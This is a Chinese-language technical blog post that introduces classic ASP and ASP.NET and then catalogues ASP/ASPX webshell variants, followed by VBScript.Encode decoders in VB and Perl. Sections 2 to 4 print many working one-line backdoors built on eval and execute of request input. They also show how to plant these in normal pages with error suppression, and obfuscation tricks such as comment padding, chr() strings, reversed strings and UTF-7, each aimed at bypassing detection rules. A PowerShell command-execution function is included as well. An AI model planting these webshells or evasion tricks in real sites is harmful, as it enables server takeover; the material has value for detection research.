catalog
0. Active Server Page(ASP)1. ASP.NET2. ASP WEBSHELL变形方式3. ASPX WEBSHELL变形方式4. webshell中常见的编码转换隐藏方式
0. Active Server Page(ASP)
ASP是动态服务器页面(Active Server Page),是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具。ASP的网页文件的格式是 .asp。现在常用于各种动态网站中
0x1: ASP脚本类型
微软的ASP语言经历了一个较长的发展周期,本质上是微软把PC上的脚本执行能力嵌入到了服务端(后来集成进了IIS)
1. VBScript: VB语言 1) ADO(ActiveX Data Object),这个组件使得程序对数据库的操作十分简单 2) COM+2. Javascript: 本质上说,Javascript并不是浏览器的专属语言,任何编译继承了Javascript Jit引擎的宿主程序都可以解释并运行Javascript代码,而IIS ASP就集成了Javascript引擎
ASP的基本语法
//注意language、CodePage都可以省略,则默认为VBScript<%@ language="javascript"%> <% Response.Write("Hello World!") %> //javascript可以简写为jscript<%@ language="jscript"%> <% Response.Write("Hello World!") %> <%@ CodePage=65001 Language="VBScript"%> <% Response.Write("Hello World!") %> 0x2: ASP内建对象和ActiveX组件的引用
ASP提供一系列由数据和程序代码封装而成的组件,目的是
1. 扩展功能 2. 简化开发
但是与此同时,丰富的功能也为大马提供了条件,大马可以利用这些扩展组件API实现文件管理、命令执行
ASP提供了六个内建对象,无须事先声明就可以直接使用,它们包括1. Request: 负责从用户端接收信息 2. Response: 负责传送信息给用户 3. Sever: 负责控制ASP的运行环境 4. Session: 负责存储个别用户的信息,以便重复使用 5. Application: 负责存储数据以供多个用户使用 6. ObjectContext: 可供ASP程序直接配合MTS进行分散式的事务处理
除了ASP内置的内建对象,ASP还可以使用ActionX组件,ActionX组件必须先在服务器上注册,然后使用Server对象的CreateObject方法创建一个组件实例
0x3: global.asa文件
Global.asa文件是一个可选的文件,它可包含可被ASP应用程序中每个页面访问的对象、变量以及方法的声明。所有合法的脚本代码都能在Global.asa中使用
Global.asa文件可包含下列内容1. Application事件2. Session事件3.
Global.asa 中的事件
在 Global.asa 中,我们可以告知 application 和 session 对象在启动和结束时做什么事情。完成这项任务的代码被放置在事件操作器中。Global.asa 文件能包含四种类型的事件1. Application_OnStart: 此事件会在首位用户从 ASP 应用程序调用第一个页面时发生。此事件会在 web 服务器重启或者 Global.asa 文件被编辑之后发生 2. Session_OnStart: 此事件会在每当新用户请求他或她的在 ASP 应用程序中的首个页面时发生 3. Session_OnEnd: 此事件会在每当用户结束 session 时发生。在规定的时间(默认的事件为 20 分钟)内如果没有页面被请求,session 就会结束 4. Application_OnEnd: 此事件会在最后一位用户结束其 session 之后发生。典型的情况是,此事件会在 Web 服务器停止时发生。此子程序用于在应用程序停止后清除设置,比如删除记录或者向文本文件写信息
Global.asa 文件可能类似这样
由于无法使用 ASP 的脚本分隔符(<% 和 %>)在 Global.asa 文件中插入脚本,我们需使用 HTML 的 <script> 元素
<object> 声明
可通过使用 <object> 标签在 Global.asa 文件中创建带有 session 或者 application 作用域的对象。<object> 标签应位于 <script> 标签之外/*1. scope: 设置对象的作用域(作用范围) 1) Session 2) Application2. id: 为对象指定一个唯一的 id 3. ProgID: 与 ClassID 关联的 id。ProgID 的格式是:[Vendor.]Component[.Version] 4. ClassID: 为 COM 类对象指定唯一的 id //ProgID 或 ClassID 必需被指定*/
实例
创建了一个名为 "MyAd" 且使用 ProgID 参数的 session 作用域对象
创建了名为 "MyConnection" 且使用 ClassID 参数的
在此 Global.asa 文件中声明的这些对象可被应用程序中的任何脚本使用,某个 .ASP 文件:
<%=MyAd.GetAdvertisement("/banners/adrot.txt")%> Relevant Link:
https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxhttps://en.wikipedia.org/wiki/Visual_Basichttps://technet.microsoft.com/zh-cn/library/dn249912.aspxhttps://msdn.microsoft.com/en-us/mt173057.aspxhttps://technet.microsoft.com/zh-cn/library/bb978526.aspxhttps://technet.microsoft.com/zh-cn/library/hh849834.aspxhttp://baike.baidu.com/subview/2616/14622918.htmhttp://www.w3schools.com/asp/asp_syntax.asphttp://www.w3school.com.cn/asp/asp_globalasa.asp
1. ASP.NET
1. ASP.NET 是新一代的 ASP。它无法兼容经典 ASP,但 ASP.NET 可以引用 ASP 2. ASP.NET 页面需要编译,因此比经典 ASP 更快 3. ASP.NET 拥有更好的语言支持,大量用户控件,基于 XML 的组件,以及对用户认证的整合 4. ASP.NET 页面的扩展名是 .aspx,通常由 VB (Visual Basic) 或 C# (C sharp) 编写 5. ASP.NET 中的用户控件可以通过不同的语言进行编写,包括 C++ 和 Java6. 当浏览器请求 ASP.NET 文件时,ASP.NET 引擎读取该文件,编译并执行文件中的脚本,然后以纯 HTML 向浏览器返回结果
0x1: ASP.NET脚本类型
ASP.NET支持使用以下几语言进行编程开发
1. Visual Basic (VB.NET)2. C# (C sharp)3. J# (Pronounced J sharp)
ASP.NET 是一个开发框架,用于通过 HTML、CSS、JavaScript 以及服务器脚本来构建网页和网站,ASP.NET 支持三种开发模式
1. Web Pages: 单页面模型2. MVC: 模型视图控制器3. Web Forms: 事件驱动模型
0x2: Web Pages(单页面模型)
Web Pages 是三种 ASP.NET 编程模型中的一种,用于创建 ASP.NET 网站和 web 应用程序, Web Pages 是最简单的 ASP.NET 网页开发编程模型。它提供了一种简单的方法将 HTML、CSS、JavaScript 以及服务器代码结合起来,Web Pages 通过可编程的 Web Helpers 进行扩展,包括数据库、视频、图像、社交网络等等
Hello Web Pages
The time is @DateTime.Now
0x3: ASP.NET MVC编程模型
MVC 是三个 ASP.NET 开发模型之一,MVC 是用于构建 web 应用程序的一种框架,使用 MVC (Model View Controller) 设计
1. Model(模型): 表示应用程序核心(比如数据库记录列表)2. View(视图)对数据(数据库记录)进行显示3. Controller(控制器)处理输入(写入数据库记录)
MVC 模型同时提供对 HTML、CSS 以及 JavaScript 的完整控制
Relevant Link:
http://www.w3school.com.cn/aspnet/webpages_intro.asphttp://www.w3school.com.cn/aspnet/webpages_intro.asphttp://www.w3school.com.cn/aspnet/http://www.w3school.com.cn/aspnet/mvc_intro.asphttp://www.w3school.com.cn/aspnet/aspnet_intro.asp
2. ASP变形方式
0x1: 一句话木马
<% execute request("op")%> <%execute request(chr(35))%> <% eval request("op")%> <%eval request.form("#")%> <%eval request.item("#")%><%Eval(Request(chr(35)))%> password:#<%Eval(((Request(chr(35)))))%> 可以有多对括号 0x2: 正常文件插马
当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误
加入容错语句可以解决此问题
<% @Language="VBScript" %><%Option ExplicitOn Error Resume Next execute request("op")Response.Buffer = TrueDim nVar, strVar, inVar = 10strVar = "Hello World"For i=1 To nVar Response.Write strVar Response.Write ""NextResponse.End%> 或者使用eval代替execute
<% @Language="VBScript" %><%Option Expliciteval request("op")Response.Buffer = TrueDim nVar, strVar, inVar = 10strVar = "Hello World"For i=1 To nVar Response.Write strVar Response.Write ""NextResponse.End%> 0x3: 利用CreateObject创建ActiveX Objects执行WEBSHELL
<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language = "VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.AddObject "session", session ms.AddObject "server", server ms.AddObject "application", application ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))") ''密码: #%> 下面逐段分析WEBSHELL代码的执行原理
1. ASP内置对象: server 创建Objects对象
The CreateObject method creates an instance of a server component. If the component has implemented the OnStartPage and OnEndPage methods, the OnStartPage method is called at this time.
CreateObject( progID)//progID: Specifies the type of object to create. The format for progID is [Vendor.] Component[ .Version].
2. MSScriptControl.ScriptControl.1对象
Microsoft(R) Script 控件使用户可以创建运行任何 ActiveX(R) scripting 引擎,例如 Microsoft(R) Visual Basic (R) Scripting Edition 或Microsoft(R) JScript(TM) 的应用程序。用户可以将任何 Automation 对象的对象模型添加到 Script 控件中,这样该对象的方法和属性就可以为 scripting 引擎所使用。通过将某个应用程序的对象模型和某个scripting 引擎加以综合,用户就可以创建一个结合了两方面优点的 scripting 应用程序。应用程序不但具有 scripting 语言的简单化特点,而且综合了一种更高级、具有完整特性的专业应用程序的对象、方法,以及属性
Microsoft Script 控件可作为一个控件或者作为一个独立的 Automation 对象创建出来。该特性可以使得用任何语言书写的应用程序都可以用 ScriptControl 宿主任何兼容的 scripting 语言3. 选择一种Scripting 语言
为 Script Control 配置正确的 scripting 语言。当在某页上作为控件创建 Script Control 时,Language 属性就被自动初始化为 "VBScript"。当作为一个 Automation 对象来创建 Script Control 时,则Language 属性留作未初始化的状态,而必须由代码作者对其进行设置,若要将 Language 属性设置为 JScript,可使用 Properties 窗口。用户也可以在代码中使用 Language 属性,如下所示
ScriptControl1.Language = "JScript" //其他 scripting 语言,例如 PERL 和 REXX,都不是由 Microsoft 所提供的,也可以为 Script 控件所用
4. Let host application to expose an object model to the script code
ms.AddObject "Response", Response ms.AddObject "request", request ms.AddObject "session", session ms.AddObject "server", server ms.AddObject "application", application
0x4: ExecuteGlobal执行WEBSHELL
<%ExecuteGlobal request(chr(35))%>
0x5: script标签中部署WEBSHELL代码
0x6: UTF7 WEBSHELL
MIME(Multipurpose Internet Mail Extensions) 中没有将 Unicode 定义为一种许可的字符集,也没有规定其如何编码。虽然已有其他的一些编码格式(如: UTF-8)应用于邮件当中,但它们使用了128到255之间的数值去表示 Unicode 字符,这对于非 US-ASCII 的字符集的编解码是不利的 因为很多邮件网关和系统无法正确地提交八位的 US-ASCII 码,这样使用扩展的 US-ASCII 的字符将出现丢失位(bit)的情况。由于 UTF-7 只使用 7 位(bit),最高位不使用,因此 UTF-7 编码能够完整的在这些系统中进行传输 对于部分US-ASCII 字符和 US-ASCII 以外的字符,UTF-7 采用"变字节顺序"的方法进行解码,并使用 US-ASCII 中的保留字符作为转换字符(shift character),UTF-7 将 Unicode 字符分为三种进行处理
1. 直接进行编码的字符,即直接使用 US-ASCII 作为编码的字符。这类字符包括大小写字母、数字字符、以及下列字符(注意不包含字符 + ) ' ( ) , - . / : ? 2. 可选择的直接进行编码的字符(注意不包含字符 \ 和字符 ~) ! " # $ % & * ; < = > @ [ ] ^ _ ' { | }3. 除1、2两种字符以外的 Unicode字符 UTF-7 的编码规则
1. direct encoding对于第一类字符,直接使用 US-ASCII 进行编码,对于第二类字符,则可选择的使用 US-ASCII 或变字节顺序的方法进行编码。但要注意,在邮件头中,若直接对第二类字符使用 US-ASCII 进行编码,可能会出现某些网关无法正确读取的现象2. Unicode shifted encoding除字符 "+" 和第一、二类两种字符以外字符需采用变字节顺序的方法进行解码,使用符号 "+" 控制编码过程的开始,直到遇到回车,换行字符或文末则结束,并使用 "-" 控制编码过程的结束。在 "+" 与 "-" 的编码采用 Base64 编码表示 例如: 字符串"A≠Α"(Unicode: 0041 2260 0391)的编码为:A+ImADkQ-(ASCII: 41 2B 49 6D 41 44 6B 51 2D)特殊字符 "+" 的编码为2B2D(H)。当出现编码为2B2D(H),即"+-"的特殊情况时,直接则认定 2D(H) 无效,并予以忽略。因此2B2D(H)编码,解码得到的字符串为"+",而不是"+-"。对于编码2B2D2D(H),解码得到的字符串才是"+-"。3. 空格(dec 32), 跳格(dec 9), 回车(dec 13)和换行(dec 10),直接使用 US-ASCII 进行编码
WEBSHELL实例
<%@codepage=65000%><%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>/*解密后<%@codepage=65000%><%response.codepage=936:eval request("#")%>*/ Relevant Link:
http://www.aspheute.com/english/20011123.asphttps://msdn.microsoft.com/en-us/library/ms524786(v=vs.90).aspxhttps://msdn.microsoft.com/en-us/library/aa227633(v=vs.60).aspxhttp://www.jb51.net/article/53368.htmhttps://support.microsoft.com/en-us/kb/185697https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspxhttp://www.wpuniverse.com/vb/showthread.php?35313-ScriptControl-Another-Method-to-run-VBScript-Codehttp://www.cnblogs.com/fvan/archive/2006/02/26/338326.html
0x7: MS Script Encoder Decoded(VBScript)
1. VBScript 是微软公司出品的脚本语言,VBScript 是微软的编程语言 Visual Basic 的轻量级的版本,同时它也是ASP (Active Server Pages)默认使用的脚本语言 2. 将 <%@ language="language" %> 这一行写到 标签的上面,就可以使用另外一种脚本语言来编写子程序或者函数:/*<% @Language="VBScript" %><%..%>*/
微软为ASP提供了一个Script Encoder工具,可以将ASP中的VBScript或JScript编码,让整个ASP脚本文件看起来像一个乱码文件,例如
ASP对如果在文件头声明中发现VBScript.Encode,同时在之后的内容中检测到
#@~^..^#~@
则自动对#@~^(内容)^#~@中的密文进行解密并解释执行
Relevant Link:
http://ayra.ch/service/vbs/vbs.asp http://www.runoob.com/vbscript/vbscript-tutorial.htmlhttp://www.microsoft.com/china/vbscript/vbstutor/vbswhat.htmhttp://blog.miniasp.com/post/2008/03/19/ASP-VBScript-Encoding-Decoding-Tool-Script-Encoder.aspx
0x8: 通过变量传递外部参数执行WEBSHELL
<% a = request("op") eval(a) %> 另一种变量传递方式
<%if request ("1")<>""then session("1")=request("1"):end if:if session("1")<>"" then execute session("1")%> 0x9: 注释符花代码绕过检测规则
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -7<%@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%>//密码是webadmin Relevant Link:
http://www.jb51.net/article/11142.htmhttps://msdn.microsoft.com/en-us/library/aa260861(v=vs.60).aspx
0x10: 自定义编码函数绕过检测特征
StrReverse Replace加密,解密后为:Execute eval request("cmd")
<% Function decode(Code) decode=Replace(StrReverse(Code),"/*/","""") '函数名作为变量,表示要返回的数据。而且""""",表示只有一个双引号("""),只能用"""",其他都会报错 End Function Execute decode(")/*/dmc/*/(tseuqer lave") 'eval request(/*/cmd/*/)%> A 0x11: 利用chr隐藏字符,用+号拼接字符
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("1"))%> 0x12: 利用asp的&连接符
ASP中&号的主要作用是用来连接的,包括:字符串-字符串、字符串-变量、变量-变量等混合连接
<%response.write("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%> //eval(request(0-2-5)) 需要明白的是,ASP对函数调用的格式比较松散,调用的函数名和参数之间并不强制要求括号,例如
call myfunc(x,y)或者call mysub(x,y)等效于:myfunc x,y或者mysub x,y
0x13: 自定义命令执行函数
<%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=))));%> 0x14: 利用Replace、StrReverse隐藏敏感关键字
<%Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>password:z
3. ASPX WEBSHELL变形方式
对于ASPX.NET C# WEBSHELL来说,变形的方式较少,大多属于功能齐全的大马
0x1: aspxspy.aspx
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %><%@ import Namespace="System.IO" %><%@ import Namespace="System.Diagnostics" %><%@ import Namespace="System.Data" %><%@ import Namespace="System.Data.OleDb" %><%@ import Namespace="Microsoft.Win32" %><%@ import Namespace="System.Net.Sockets" %><%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %><%@ import Namespace="System.DirectoryServices" %>ASPXSpy1.0 -> Bin:)
0x2: 简单CMS WEBSHELL
<%@ Page Language="C#" AutoEventWireup="true" %><%@ Import Namespace="System.Runtime.InteropServices" %><%@ Import Namespace="System.IO" %><%@ Import Namespace="System.Data" %><%@ Import Namespace="System.Reflection" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.Web" %><%@ Import Namespace="System.Web.UI" %><%@ Import Namespace="System.Web.UI.WebControls" %>
Relevant Link:
http://www.jb51.net/article/26387.htmhttp://blog.csdn.net/zaiyong/article/details/25873399https://raw.githubusercontent.com/tennc/webshell/master/net-friend/aspx/aspxspy.aspxhttp://www.jb51.net/article/39983.htmhttps://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspxhttps://github.com/tennc/webshell/blob/master/aspx/icesword.aspx
0x3: PowerShell Webshell
string do_ps(string arg){ //This section based on cmdasp webshell by http://michaeldaw.org ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s;} Relevant Link:
https://www.microsoft.com/taiwan/technet/columns/profwin/28-monad.mspxhttps://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx
4. webshell中常见的编码转换隐藏方式
0x1: VBScript.encode
Public Function DCScript(ByVal Script As String) As String Dim s As String, l As Long Dim b As Long, e As Long Dim k As Long l = LenB(Script): s = Space(l) '... b = InStr(Script, "#@~^") '#@~^******== e = InStr(Script, "^#~@") '******==^#~@ If b = 0 Or e = 0 Then If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then Exit Function Else If e = 0 Then e = l Else e = e - 8 If b = 0 Then b = 1 Else b = b + 12 End If Else b = b + 12 '为0则全部解密 e = e - 8 '为0则算到末尾 End If frmMain.Caption = "Decoding ..." Script = Mid(Script, b, e - b + 1) 'Script = Replace(Script, "@#", Chr(13)) 'Script = Replace(Script, "@&", Chr(10)) Script = Replace(Script, "@#@&", Chr(13) + Chr(10)) 'vbcCrlf Script = Replace(Script, "@!", "<") Script = Replace(Script, "@*", ">") Script = Replace(Script, "@$", "@") '最后生成@ 'k = YXScrDecode(Script, s, Len(Script)) k = YXScrDecoder(Script, s) 's = Replace(s, Chr(13) + Chr(2), vbCrLf)'查出来是0x10和0x0A的原因 '引出另一个问题,为什么char数组第-1个元素为0x02 frmMain.Caption = "碰到我算你倒霉!" DCScript = Left(s, k)End Function perl代码
#!/usr/bin/perl -w -- # VBScript/JScript.Encode Decoder # Based on Full-Disclosure message "VBScript/JScript.Encode Decoder" # by Andreas Marx, dated 16 Sep 03 # http://lists.netsys.com/pipermail/full-disclosure/2003-September/010155.html # # See also: # http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm # http://www.saltstorm.net/lib-soya/Soya/Encode/ScriptDecoder.js # http://www.virtualconspiracy.com/scrdec.html # http://www.virtualconspiracy.com/download/scrdec14.c # http://www.r4k.net/dec/dec.pl @itab = ( # table order 0,2,1,0,2,1,2,1,1,2,1,2,0,1,2,1, 0,1,2,1,0,0,2,1,1,2,0,1,2,1,1,2, 0,0,1,2,1,2,1,0,1,0,0,2,1,0,1,2, 0,1,2,1,0,0,2,1,1,0,0,2,1,0,1,2); @dectab0 = ( # tables to decrypt "\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x57","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F", "\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F", "\x2E","\x47","\x7A","\x56","\x42","\x6A","\x2F","\x26","\x49","\x41","\x34","\x32","\x5B","\x76","\x72","\x43", "\x38","\x39","\x70","\x45","\x68","\x71","\x4F","\x09","\x62","\x44","\x23","\x75","\x3C","\x7E","\x3E","\x5E", "\xFF","\x77","\x4A","\x61","\x5D","\x22","\x4B","\x6F","\x4E","\x3B","\x4C","\x50","\x67","\x2A","\x7D","\x74", "\x54","\x2B","\x2D","\x2C","\x30","\x6E","\x6B","\x66","\x35","\x25","\x21","\x64","\x4D","\x52","\x63","\x3F", "\x7B","\x78","\x29","\x28","\x73","\x59","\x33","\x7F","\x6D","\x55","\x53","\x7C","\x3A","\x5F","\x65","\x46", "\x58","\x31","\x69","\x6C","\x5A","\x48","\x27","\x5C","\x3D","\x24","\x79","\x37","\x60","\x51","\x20","\x36"); @dectab1 = ( "\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x7B","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F", "\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F", "\x32","\x30","\x21","\x29","\x5B","\x38","\x33","\x3D","\x58","\x3A","\x35","\x65","\x39","\x5C","\x56","\x73", "\x66","\x4E","\x45","\x6B","\x62","\x59","\x78","\x5E","\x7D","\x4A","\x6D","\x71","\x3C","\x60","\x3E","\x53", "\xFF","\x42","\x27","\x48","\x72","\x75","\x31","\x37","\x4D","\x52","\x22","\x54","\x6A","\x47","\x64","\x2D", "\x20","\x7F","\x2E","\x4C","\x5D","\x7E","\x6C","\x6F","\x79","\x74","\x43","\x26","\x76","\x25","\x24","\x2B", "\x28","\x23","\x41","\x34","\x09","\x2A","\x44","\x3F","\x77","\x3B","\x55","\x69","\x61","\x63","\x50","\x67", "\x51","\x49","\x4F","\x46","\x68","\x7C","\x36","\x70","\x6E","\x7A","\x2F","\x5F","\x4B","\x5A","\x2C","\x57"); @dectab2 = ( "\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x6E","\x0A","\x0B","\x0C","\x06","\x0E","\x0F", "\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F", "\x2D","\x75","\x52","\x60","\x71","\x5E","\x49","\x5C","\x62","\x7D","\x29","\x36","\x20","\x7C","\x7A","\x7F", "\x6B","\x63","\x33","\x2B","\x68","\x51","\x66","\x76","\x31","\x64","\x54","\x43","\x3C","\x3A","\x3E","\x7E", "\xFF","\x45","\x2C","\x2A","\x74","\x27","\x37","\x44","\x79","\x59","\x2F","\x6F","\x26","\x72","\x6A","\x39", "\x7B","\x3F","\x38","\x77","\x67","\x53","\x47","\x34","\x78","\x5D","\x30","\x23","\x5A","\x5B","\x6C","\x48", "\x55","\x70","\x69","\x2E","\x4C","\x21","\x24","\x4E","\x50","\x09","\x56","\x73","\x35","\x61","\x4B","\x58", "\x3B","\x57","\x22","\x6D","\x4D","\x25","\x28","\x46","\x4A","\x32","\x41","\x3D","\x5F","\x4F","\x42","\x65"); $_ = join('', <>); (m/\Q#@~^\E/ and $_ = $') or die "Start marker not found\n"; (m/\Q^#~@\E/ and $_ = $`) or die "End marker not found\n"; # We do not check leading checksum. Is trailing checksum always present? (m/^[A-Za-z0-9+\/]{ 6}==/ and $_ = $') or die "No leading checksum\n"; (m/[A-Za-z0-9+\/]{ 6}==$/ and $_ = $`); # or die "No trailing checksum\n"; $pos = 0; # decrypt encrypted block $special = 0; foreach (split //) { if ($special) { $special = 0; tr/&#!*$/\n\r<>@/; } elsif ($_ lt "\x80") { # encrypted? if ($itab[$pos] == 0) { $_ = $dectab0[ord($_)]; } elsif ($itab[$pos] == 1) { $_ = $dectab1[ord($_)]; } elsif ($itab[$pos] == 2) { $_ = $dectab2[ord($_)]; } if ($_ eq "\xff") { $special = 1; next; } } print; $pos = ($pos+1)%64; }
Relevant Link:
http://dennisbabkin.com/screnc/http://blog.csdn.net/prsniper/article/details/5447675http://www.password-crackers.com/crack/scrdec.htmlhttp://download.aprilgreendownload.com/lp7_750/query.php?q=vbscript+encoder+download&ti1=12767882&ti2=0&ti3=2016-01-12T08%3A12%3A46.786244%2B00%3A00http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/29670
0x2: UTF-7
Relevant Link:
http://www.xuebuyuan.com/1266585.html
Copyright (c) 2015 LittleHann All rights reserved